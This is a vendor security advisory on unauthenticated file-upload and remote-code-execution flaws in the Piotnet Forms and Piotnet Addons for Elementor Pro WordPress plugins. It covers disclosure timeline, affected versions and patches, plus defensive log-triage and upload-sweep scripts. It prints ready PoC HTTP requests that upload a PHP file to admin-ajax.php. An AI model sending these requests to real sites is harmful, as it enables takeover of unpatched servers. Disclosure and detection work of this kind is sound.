
High severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons For Elementor Pro Plugins

Recently, the Imunify360 team discovered high severity vulnerabilities in the Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. Sergey Brazhnik, Security Analyst from the Imunify360 Web Protection Team, conducted a detailed analysis of the Piotnet Forms and Addons vulnerabilities. Keep on reading to find out more about the following:

  1. Piotnet Vulnerabilities: Summary and Timeline
  2. Piotnet Vulnerabilities Details
  3. Recommendations


Piotnet Vulnerabilities: Summary and Timeline

On July 7, 2021, the Imunify360 Web Protection team started the responsible disclosure process for Unauthenticated File Upload and Remote Code Execution vulnerabilities discovered in the Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. An attacker could potentially upload malicious files to the plugins' upload directory and execute the uploaded scripts.

Naturally, Imunify360 customers were protected from these vulnerabilities and all initial exploitation attempts were blocked by Imunify360. 

The Piotnet developers were provided with a detailed report on July 7, 2021, followed by a PoC and recommendations on August 25, 2021. Since there were no updates from the developers, the WordPress.org plugins team was informed about the vulnerable free plugin version available on the WordPress.org marketplace at https://wordpress.org/plugins/piotnetforms/. The WordPress.org team temporarily blocked the plugin from public access on September 27, 2021; as a result, the new 1.0.23 version of Piotnet Forms Free was released on October 1, 2021.

Finally, on October 13, 2021, the Piotnet developers released patched versions of Piotnet Forms Pro (1.1.14) and Piotnet Addons For Elementor Pro (6.4.12).

 

Piotnet Vulnerabilities Details

Description: Unauthenticated File Upload and RCE in Piotnet Forms

Affected Plugin: Piotnet Forms

Affected Versions: <= 1.0.22

CVE ID: pending

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Fully Patched Version: 1.0.23

 

Description: Unauthenticated File Upload and RCE in Piotnet Forms Pro

Affected Plugin: Piotnet Forms Pro

Affected Versions: <= 1.1.13

CVE ID: pending

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Fully Patched Version: 1.1.14

 

For the Piotnet Forms plugins, both Free and Pro versions, the vulnerable function is:

piotnetforms_ajax_form_builder

 

Vulnerable file:

inc/forms/ajax-form-builder.php

 

The function is allowed for non-authenticated users.

Furthermore, there is no validation of the parameters this function requires, such as post_id and form_id; for an attack to succeed, the parameters only need to be present in the request.

Next, the function's code doesn't check the extension of uploaded files, which makes it possible to upload files with any extension and subsequently execute them.

Finally, although the file name is generated randomly, the /wp-content/uploads/piotnetforms/files/ folder has file listing enabled and is available for visitors to view.

 

PoC:

 

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vuln_domain.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------205816383
Content-Length: 645
Origin: http://vuln_domain.com
Connection: close

----------205816383
Content-Disposition: form-data; name="action"

piotnetforms_ajax_form_builder
----------205816383
Content-Disposition: form-data; name="post_id"

11111
----------205816383
Content-Disposition: form-data; name="form_id"

d253bdb1
----------205816383
Content-Disposition: form-data; name="fields"

[]
----------205816383
Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2
----------205816383
Content-Disposition: form-data; name="file[]"; filename="file.php"
Content-Type: application/octet-stream

<?php
echo("PoC for vulnerability is confirmed");
?>
----------205816383--



Description: Unauthenticated File Upload and RCE in Piotnet Addons for Elementor Pro

Affected Plugin: Piotnet Addons for Elementor Pro

Affected Versions: <= 6.4.11

CVE ID: pending

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Fully Patched Version: 6.4.12

 

For Piotnet Addons For Elementor Pro, the case is quite similar, except that the function name is pafe_ajax_form_builder and the uploads directory is /wp-content/uploads/piotnet-addons-for-elementor/, while the rest of the code is identical. The free version available at https://wordpress.org/plugins/piotnet-addons-for-elementor/ is NOT affected since it doesn’t contain the vulnerable functionality.

 

PoC:

 

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vuln_domain.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------205816383
Content-Length: 645
Origin: http://vuln_domain.com
Connection: close

----------205816383
Content-Disposition: form-data; name="action"

pafe_ajax_form_builder
----------205816383
Content-Disposition: form-data; name="post_id"

11111
----------205816383
Content-Disposition: form-data; name="form_id"

d253bdb1
----------205816383
Content-Disposition: form-data; name="fields"

[]
----------205816383
Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2
----------205816383
Content-Disposition: form-data; name="file[]"; filename="file.php"
Content-Type: application/octet-stream

<?php
echo("PoC for vulnerability is confirmed");
?>
----------205816383--
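
The behaviour described above shows up in web-server access logs as listing or script requests under the two upload directories, often from a client that also POSTed to admin-ajax.php. The triage script below is an added example, not code from the original post; the Combined Log Format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Upload directories named in this advisory.
UPLOAD_DIRS = ("/wp-content/uploads/piotnetforms/files/",
               "/wp-content/uploads/piotnet-addons-for-elementor/")
AJAX_ENDPOINT = "/wp-admin/admin-ajax.php"
# Extensions a PHP handler may execute (assumed list; match it to your server config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)([./]|$)", re.IGNORECASE)
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3}) ')

def triage(lines):
    """Return {client_ip: [findings]} for requests that touch the upload directories."""
    ajax_posts = defaultdict(int)
    findings = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        path = unquote(target.split("?", 1)[0])
        if method == "POST" and path == AJAX_ENDPOINT:
            ajax_posts[ip] += 1  # normal on any WordPress site; used only for correlation
            continue
        base = next((d for d in UPLOAD_DIRS if path.startswith(d)), None)
        if base is None:
            continue
        name = path[len(base):]
        if name == "" or name.endswith("/"):
            findings[ip].append(f"listing {status} {path}")
        elif SCRIPT_EXT.search(name):
            findings[ip].append(f"script {status} {path}")
    for ip in findings:
        if ajax_posts[ip]:
            findings[ip].append(f"ajax-posts {ajax_posts[ip]}")
    return dict(findings)

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Sep/2021:10:00:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 52 "-" "curl/7.68.0"',
    '203.0.113.7 - - [01/Sep/2021:10:00:03 +0000] "GET /wp-content/uploads/piotnetforms/files/ HTTP/1.1" 200 1190 "-" "curl/7.68.0"',
    '203.0.113.7 - - [01/Sep/2021:10:00:04 +0000] "GET /wp-content/uploads/piotnetforms/files/5f3a9c.php HTTP/1.1" 200 34 "-" "curl/7.68.0"',
    '198.51.100.20 - - [01/Sep/2021:10:05:09 +0000] "GET /wp-content/uploads/piotnetforms/files/cv.pdf HTTP/1.1" 200 8211 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Sep/2021:11:00:00 +0000] "GET /wp-content/uploads/piotnet-addons-for-elementor/x.PHP?c=1 HTTP/1.1" 404 0 "-" "-"',
]
if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

A 200 status on a script path under either directory means the server served or executed it and warrants immediate review; other statuses indicate probing.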

 

Recommendations

To protect your servers from exploitation of these vulnerabilities, we strongly recommend:

  • Enabling Imunify360 security features like WAF, Proactive Defence, Real-time Malware Scan and PHP Immunity, since, apart from rules created for these particular vulnerabilities, your servers will be proactively protected with a complex generic system that is able to detect suspicious activity and stop attackers on the fly.
  • Updating your Piotnet plugins to the latest versions.
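
Updating a plugin does not delete files that were already written to its upload directory, so the two directories named in this advisory are worth sweeping after patching. This added example (not from the original post) flags files there that carry a script extension or a PHP open tag; the `wp_root` argument, the extension list and the demo tree are assumptions constructed for illustration.

```python
import os
import tempfile

# Upload directories named in this advisory, relative to the WordPress root.
UPLOAD_DIRS = ("wp-content/uploads/piotnetforms/files",
               "wp-content/uploads/piotnet-addons-for-elementor")
# Extensions a PHP handler may execute (assumed list; match it to your server config).
SCRIPT_EXT = {".php", ".php5", ".php7", ".phtml", ".phar", ".pht"}

def sweep(wp_root):
    """Return sorted (relative_path, reason) pairs for files that need review."""
    hits = []
    for rel_dir in UPLOAD_DIRS:
        for folder, _dirs, files in os.walk(os.path.join(wp_root, rel_dir)):
            for fname in files:
                full = os.path.join(folder, fname)
                rel = os.path.relpath(full, wp_root).replace(os.sep, "/")
                # Check every dot-suffix so "name.php.jpg" is caught as well as "name.php".
                suffixes = {"." + part for part in fname.lower().split(".")[1:]}
                if suffixes & SCRIPT_EXT:
                    hits.append((rel, "script extension"))
                    continue
                # Only the first 8 KiB is inspected; a tag later in the file is missed.
                with open(full, "rb") as fh:
                    head = fh.read(8192)
                if b"<?php" in head.lower():
                    hits.append((rel, "PHP open tag in content"))
    return sorted(hits)

def build_demo_tree(root):
    """Create a constructed upload tree: two benign files and three that should be flagged."""
    samples = {
        UPLOAD_DIRS[0] + "/cv.pdf": b"%PDF-1.4 constructed benign sample",
        UPLOAD_DIRS[0] + "/9d2e41.php": b"<?php echo 'constructed'; ?>",
        UPLOAD_DIRS[0] + "/photo.jpg": b"\xff\xd8\xff\xe0 <?php /* constructed */ ?>",
        UPLOAD_DIRS[1] + "/note.txt": b"constructed benign text",
        UPLOAD_DIRS[1] + "/b7.phtml.txt": b"constructed",
    }
    for rel, data in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        for rel, reason in sweep(tmp):
            print(f"{reason:24} {rel}")
```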

